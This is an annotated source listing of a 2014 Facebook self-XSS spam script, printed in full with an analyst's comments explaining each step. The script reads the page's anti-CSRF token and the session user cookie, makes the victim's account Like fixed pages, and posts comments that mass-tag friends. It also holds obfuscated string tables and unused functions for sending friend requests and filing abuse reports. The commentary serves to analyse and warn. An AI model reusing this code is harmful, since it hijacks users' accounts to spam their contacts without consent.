- // I first saw this code on 2014-02-01 around midnight
- // this is the source code that was being posted in facebook that night,
- // it is a self cross-site scripting attack; people were led to copy-paste
- // this into their browser console.
- // in short: it spams your friends by linking them to comments on the page
- // it opens up a little window and plays some music while it's at it.
- // I was able to deduce the behavior of the script; if you plan to read it
- // you will need some knowledge of Javascript and AJAX to fully understand
- // how the script does it.
- // Though, it doesn't contain any exploits of any kind, so it's
- // not the fault of facebook in any way. The users themselves are
- // to blame for the spamming.
- // Grab the document root and body so the audio bar can be injected below.
- // (parent is never used again in this listing)
- var parent = document.getElementsByTagName("html")[0];
- var _body = document.getElementsByTagName('body')[0];
- // Create a new div: a bar pinned to the bottom of the viewport
- var _div = document.createElement('div');
- // "25" carries no unit, so this height is probably ignored by the browser
- _div.style.height = "25";
- _div.style.width = "100%";
- _div.style.position = "fixed";
- _div.style.top = "auto";
- _div.style.bottom = "0";
- _div.align = "center";
- // Add new audio element that starts playing as soon as it is attached
- var _audio = document.createElement('audio');
- _audio.style.width = "100%";
- _audio.style.height = "25px";
- _audio.controls = true;
- // the first autoplay assignment is immediately overwritten by the second
- _audio.autoplay = false;
- _audio.autoplay = true;
- // Super Mario Ringtone.mp3 ?  (hosted on a third-party site; the file itself is not part of this listing)
- _audio.src = "http://picosong.com/YPGz";
- _div.appendChild(_audio);
- _body.appendChild(_div);
- // i suspect this is a token facebook uses to identify a user's request
- // it is used to hash requests in order to validate them (phstamp)
- // Presumably the page's anti-CSRF token: because the script runs inside the victim's
- // own page, it can read the token from the DOM and attach it to every request below,
- // so nothing in those requests distinguishes them from the user's own clicks.
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // this is an object carrying the users unique facebook id
- // it is NOT only a string with the user id, to get solely the user_id a
- // document.cookie.match(/c_user=(\d+)/)[1]) would suffice.
- // (the outer match() turns the id string into a RegExp and returns a one-element
- // match array; it only "works" because that array stringifies to the id when it is
- // concatenated into a query string further down)
- // note that the current session can be hijacked with access to the cookie
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // the variables are unnecessarily redeclared
- var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // follow a facebook page
- // abone is the profile id to be followed
- // The XHR is same-origin, so the victim's session cookies are attached automatically;
- // together with the fb_dtsg token read above the request looks like an ordinary
- // press of a follow button on the server side.
- function a(abone) {
- var http4 = new XMLHttpRequest;
- var url4 = "/ajax/follow/follow_profile.php?__a=1";
- // "&__" + user_id is a malformed parameter (no key name), and phstamp is left empty
- var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
- http4.open("POST", url4, true);
- http4.onreadystatechange = function () {
- // http4.close is a bare property read, not a call: this handler does nothing
- if (http4.readyState == 4 && http4.status == 200) http4.close
- };
- http4.send(params4)
- }
- // executes the previous function with an empty string as a parameter
- // therefore it doesn't follow anybody.
- // This function is not called anywhere else in the script
- // (a POST to follow_profile.php with an empty profile_id is still sent, so this is
- // the first request the script makes with the victim's session)
- a("");
- // subscribes to a set of facebook pages/users
- // uidss is a String array
- // Not invoked anywhere in this listing.
- function sublist(uidss) {
- // create a new script element inside the scope of the page
- // seems unnecessary since we already have script access
- // (the local "a" shadows the follow function a() declared above)
- var a = document.createElement('script');
- // uidss is not serialized as expected in this expression
- // (an array is stringified as comma-joined ids inserted unquoted, so the generated
- // source is malformed for any list with more than one element)
- a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
- // places script node in the body of the page, which runs the source above using
- // the page's own AsyncRequest helper (not defined in this listing)
- document.body.appendChild(a)
- }
- // the user_id variable is re-declared once again (3rd time)
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // get the timestamp (milliseconds since the epoch; used as the client_id in P() below)
- var now = (new Date).getTime();
- // Likes a single post/story as the victim: POST to like.php with the post id used
- // both as ft_ent_identifier and as ft[mf_story_key]. The __dyn/__req/qid values look
- // copied from a captured request. Not invoked anywhere in this listing.
- function P(post) {
- var X = new XMLHttpRequest();
- var XURL = "//www.facebook.com/ajax/ufi/like.php";
- // phstamp is left empty here as well
- var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
- X.open("POST", XURL, true);
- X.onreadystatechange = function () {
- if (X.readyState == 4 && X.status == 200) {
- // bare property read, not a call: the handler is a no-op
- X.close
- }
- };
- X.send(XParams)
- }
- // 4th time these variables are re-declared
- // (same values as before; the redeclarations suggest several snippets pasted together)
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // This code Likes a facebook page, don't know if it works,
- // it seems like its missing the phstamp hash, not confirmed
- // but phstamp might be only required for administrator requests
- // p is the page id; the request is fan_status.php with add=true, sent as the victim.
- // Called twice below with hard-coded page ids.
- function Like(p) {
- var Page = new XMLHttpRequest();
- var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
- // note the leading "&" in the body and the empty phstamp
- var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
- Page.open("POST", PageURL, true);
- Page.onreadystatechange = function () {
- if (Page.readyState == 4 && Page.status == 200) {
- // bare property read, not a call: the handler is a no-op
- Page.close
- }
- };
- Page.send(PageParams)
- }
- // first of two hard-coded page ids that the victim's account is made to Like
- Like("185309954944253");
- // This function creates a friend request
- // r is the target user id; the request is add_friend/action.php sent as the victim.
- // Not invoked anywhere in this listing.
- function IDS(r) {
- var X = new XMLHttpRequest();
- var XURL = "//www.facebook.com/ajax/add_friend/action.php";
- // "&&&" leaves two empty parameters; phstamp is empty as in the other functions
- var XParams = "to_friend=" + r + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
- X.open("POST", XURL, true);
- X.onreadystatechange = function () {
- if (X.readyState == 4 && X.status == 200) {
- // bare property read, not a call: the handler is a no-op
- X.close
- }
- };
- X.send(XParams)
- }
- // second hard-coded page id that the victim's account is made to Like
- Like("1376249559308318");
- // From here on, the code is obfuscated. By evaluating pieces of code one is able
- // to get the source code. These are some of the strings used in the code: (giving a good idea what it does)
- //
- // var _0xb161 = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "getTime",
- // "//www.facebook.com/ajax/report/social.php", "fb_dtsg=",
- // "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A",
- // "%2C%22content_type%22%3A0%2C%22expand_report%22%3A…ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A",
- // "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A", "%2C%22user%22%3A",
- // "%7D&file_report=1&__user=", "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880",
- // "POST", "open", "onreadystatechange", "readyState", "status", "close", "send", "100006952119048"];
- //
- // The same strings written as hex escapes: a string table indexed by the lines below so
- // that property names and URLs do not appear in plain text. Entry [21] ("100006952119048")
- // is not referenced anywhere in this listing.
- var _0xb161 = ["\x76\x61\x6C\x75\x65", "\x66\x62\x5F\x64\x74\x73\x67", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65", "\x6D\x61\x74\x63\x68", "\x63\x6F\x6F\x6B\x69\x65", "\x67\x65\x74\x54\x69\x6D\x65", "\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70", "\x66\x62\x5F\x64\x74\x73\x67\x3D", "\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x
32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41", "\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D", "\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30", "\x50\x4F\x53\x54", "\x6F\x70\x65\x6E", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x73\x74\x61\x74\x75\x73", "\x63\x6C\x6F\x73\x65", "\x73\x65\x6E\x64", "\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];
- // THIS (5th redeclaration, now going through the string table so the property names
- // getElementsByName / cookie / match / getTime never appear in clear text):
- var fb_dtsg = document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];
- var user_id = document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);
- var now = (new Date)[_0xb161[5]]();
- // Is exactly the same as:
- // var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // var now = (new Date).getTime();
- // Files an abuse report against the id passed in (social.php, report_type 145 with
- // block=1 in the decoded strings), sent as the victim; the same id fills both the cid
- // and rid fields. Report is the only user of the _0xb161 table and is not invoked
- // anywhere in this listing.
- function Report(_0x45e7x5) {
- var _0x45e7x6 = new XMLHttpRequest();
- // "//www.facebook.com/ajax/report/social.php"
- var _0x45e7x7 = _0xb161[6];
- // fb_dtsg=<token>&block=1&pp=<url-encoded report json: cid/rid=<id>, time_flow_started=now,
- // user=<uid>>&file_report=1&__user=<uid>&__a=1&__dyn=...&__req=u&ttstamp=<fixed value from [13]>
- var _0x45e7x8 = _0xb161[7] + fb_dtsg + _0xb161[8] + _0x45e7x5 + _0xb161[9] + _0x45e7x5 + _0xb161[10] + now + _0xb161[11] + user_id + _0xb161[12] + user_id + _0xb161[13];
- // open("POST", url, true)
- _0x45e7x6[_0xb161[15]](_0xb161[14], _0x45e7x7, true);
- // onreadystatechange: on readyState 4 / status 200 a bare .close read (no-op)
- _0x45e7x6[_0xb161[16]] = function () {
- if (_0x45e7x6[_0xb161[17]] == 4 && _0x45e7x6[_0xb161[18]] == 200) {
- _0x45e7x6[_0xb161[19]];
- };
- };
- // send(params)
- _0x45e7x6[_0xb161[20]](_0x45e7x8);
- };
- // More strings that are later referenced.
- // In view that there are multiple string arrays, some parts of the code were obfuscated at
- // different times by different methods, it demonstrates that the so called "hacker" has an unusually
- // high ability to copy-paste source code from the internet.
- // Second string table, used by arkadaslari_al / RandomArkadas / yorum_yap below. Only the
- // "&" (\x26) and quote (\x22) characters are escaped here, so it is readable as-is; the
- // entries are property names, query-string fragments and the two typeahead endpoints.
- var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "1382559332008832",
- "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText",
- ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ",
- "\x26filter[0]=user", "\x26options[0]=friends_only", "\x26options[1]=nm", "\x26token=v7",
- "\x26viewer=", "\x26__user=", "https://", "indexOf", "URL", "GET",
- "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open",
- "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor",
- "\x26ft_ent_identifier=", "\x26comment_text=", "\x26source=2", "\x26client_id=1377871797138:1707018092",
- "\x26reply_fbid", "\x26parent_comment_id", "\x26rootid=u_jsonp_2_3",
- "\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:", "}",
- "\x26attached_sticker_fbid=0", "\x26attached_photo_fbid=0", "\x26giftoccasion", "\x26ft[tn]=[]", "\x26__a=1",
- "\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "\x26__req=q", "\x26fb_dtsg=", "\x26ttstamp=", "POST",
- "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader",
- "status", "close"];
- // Again this code is redeclared (6th time now)
- var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
- var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
- // the hard-coded post id ("1382559332008832") that every spam comment is attached to;
- // handed to arkadaslari_al(id) at the very end of the script
- var id = _0xa22c[5];
- // Initializes an empty array; overwritten with the friend-list response by the eval() in arkadaslari_al
- var arkadaslar = [];
- // Initializes a variable (possibly a vestige of a Subversion)
- // note that this is not used anywhere
- var svn_rev;
- // From here on, it simply gets your friends ids and spams them by including them in comments.
- // Fetches the victim's friend list (typeahead first_degree.php with friends_only) and, in
- // batches of 27, posts them as " @[uid:name]" mentions in comments on the post given by id
- // (the parameter shadows the global id; the single call below passes that global).
- function arkadaslari_al(id) {
- var _0x7892x7 = new XMLHttpRequest();
- // onreadystatechange handler; note there is no status check here, unlike the other handlers
- _0x7892x7[_0xa22c[6]] = function () {
- if (_0x7892x7[_0xa22c[7]] == 4) {
- // Strips the "for (;;);" anti-JSON-hijacking prefix from responseText and eval()s the
- // remainder as "arkadaslar = <response>;" — the server response is executed as code
- // rather than parsed, and the result lands in the global arkadaslar.
- eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]);
- // Math.round(entries.length / 27) batches of 27: a trailing partial batch with fewer
- // than 14 friends is dropped by the rounding. f, i, mesaj and mesaj_text are all
- // implicit globals (no var).
- for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) {
- mesaj = _0xa22c[10];
- // mesaj_text (a plain " name name ..." list) is built but never used
- mesaj_text = _0xa22c[10];
- for (i = f * 27; i < (f + 1) * 27; i++) {
- if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
- // " @[" + uid + ":" + text + "]" — the mention syntax that tags the friend
- mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22];
- mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
- };
- };
- // one comment per batch
- yorum_yap(id, mesaj);
- };
- };
- };
- // query string: &filter[0]=user&options[0]=friends_only&options[1]=nm&token=v7&viewer=<uid>&__user=<uid>
- var _0x7892x8 = _0xa22c[24];
- _0x7892x8 += _0xa22c[25];
- _0x7892x8 += _0xa22c[26];
- _0x7892x8 += _0xa22c[27];
- _0x7892x8 += _0xa22c[28] + user_id;
- _0x7892x8 += _0xa22c[29] + user_id;
- // GET from the https endpoint if document.URL contains "https://", otherwise the http one
- if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) {
- _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true);
- } else {
- _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true);
- };
- // send()
- _0x7892x7[_0xa22c[37]]();
- };
- // Builds a string of 9 " @[uid:name]" mentions picked at random from the eval()ed friend
- // list. The uid and the name come from two independent random draws, so they usually do
- // not belong to the same friend. Not invoked anywhere in this listing; i is an implicit global.
- function RandomArkadas() {
- var _0x7892xa = _0xa22c[10];
- for (i = 0; i < 9; i++) {
- _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22];
- };
- return _0x7892xa;
- };
- // Posts one comment on post id with the given text (the mention list built by the caller)
- // via /ajax/ufi/add_comment.php, sent as the victim with the fb_dtsg token. The client_id,
- // __dyn and clp values are fixed strings from the table, apparently copied from a captured
- // request; ttstamp is left empty.
- function yorum_yap(id, _0x7892xc) {
- var _0x7892xd = new XMLHttpRequest();
- var _0x7892x8 = _0xa22c[10];
- // &ft_ent_identifier=<post id>
- _0x7892x8 += _0xa22c[40] + id;
- // &comment_text=<url-encoded mention list> — the only value that is actually encoded
- _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc);
- _0x7892x8 += _0xa22c[42];
- _0x7892x8 += _0xa22c[43];
- _0x7892x8 += _0xa22c[44];
- _0x7892x8 += _0xa22c[45];
- _0x7892x8 += _0xa22c[46];
- // &clp={...,"parent_fbid":<post id>}
- _0x7892x8 += _0xa22c[47] + id + _0xa22c[48];
- _0x7892x8 += _0xa22c[49];
- _0x7892x8 += _0xa22c[50];
- _0x7892x8 += _0xa22c[51];
- _0x7892x8 += _0xa22c[52];
- // &__user=<uid>
- _0x7892x8 += _0xa22c[29] + user_id;
- _0x7892x8 += _0xa22c[53];
- _0x7892x8 += _0xa22c[54];
- _0x7892x8 += _0xa22c[55];
- // &fb_dtsg=<token>
- _0x7892x8 += _0xa22c[56] + fb_dtsg;
- // &ttstamp= (empty)
- _0x7892x8 += _0xa22c[57];
- // open("POST", "/ajax/ufi/add_comment.php", true)
- _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true);
- // setRequestHeader("Content-type", "application/x-www-form-urlencoded")
- _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]);
- // onreadystatechange: readyState 4 / status 200, then a bare .close read (no-op)
- _0x7892xd[_0xa22c[6]] = function () {
- if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) {
- _0x7892xd[_0xa22c[64]];
- };
- };
- // send(params)
- _0x7892xd[_0xa22c[37]](_0x7892x8);
- };
- // Kicks off the actual spam: fetches the friend list and comments on the hard-coded post id
- // set above. Together with a("") and the two Like() calls, this is all the script executes;
- // sublist, P, IDS, Report and RandomArkadas are defined but never called here.
- arkadaslari_al(id);
- /* Conclusion:
- * This script was clearly done by a script kiddie, there are tons of copy-pasted code and obvious
- * errors within making portions of the script unusable and redundant.
- *
- * It's amazing people actually paste this code into their browser, even when they are educated not
- * to do so.
- *
- * I guess these are the same people that get told not to eat glue at school.
- *
- * By: El Ninja
- * 2014-02-03
- */